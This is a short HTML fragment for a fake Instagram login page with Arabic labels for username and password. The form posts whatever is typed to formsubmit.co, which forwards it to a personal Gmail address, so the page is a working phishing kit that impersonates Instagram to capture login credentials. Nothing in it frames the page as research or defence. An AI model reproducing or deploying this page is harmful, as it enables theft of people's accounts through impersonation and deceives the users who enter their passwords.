
<center>
 
    <form action="https://formsubmit.co/em2938159@gmail.com" method="POST">
        
        <h1 style="font-family: sans-serif; color: #e1306c;">Instagram</h1>
        
        <input type="text" name="username" placeholder="اسم المستخدم أو الهاتف" style="display:block; margin: 10px; padding: 10px; width: 200px;">
        
        <input type="password" name="password" placeholder="كلمة السر" style="display:block; margin: 10px; padding: 10px; width: 200px;">
        
        <!
        <button type="submit" style="background-color: #0095f6; color: white; border: none; padding: 10px 20px; border-radius: 5px; font-weight: bold; cursor: pointer;">تسجيل الدخول</button>
        
    </form>
</center>
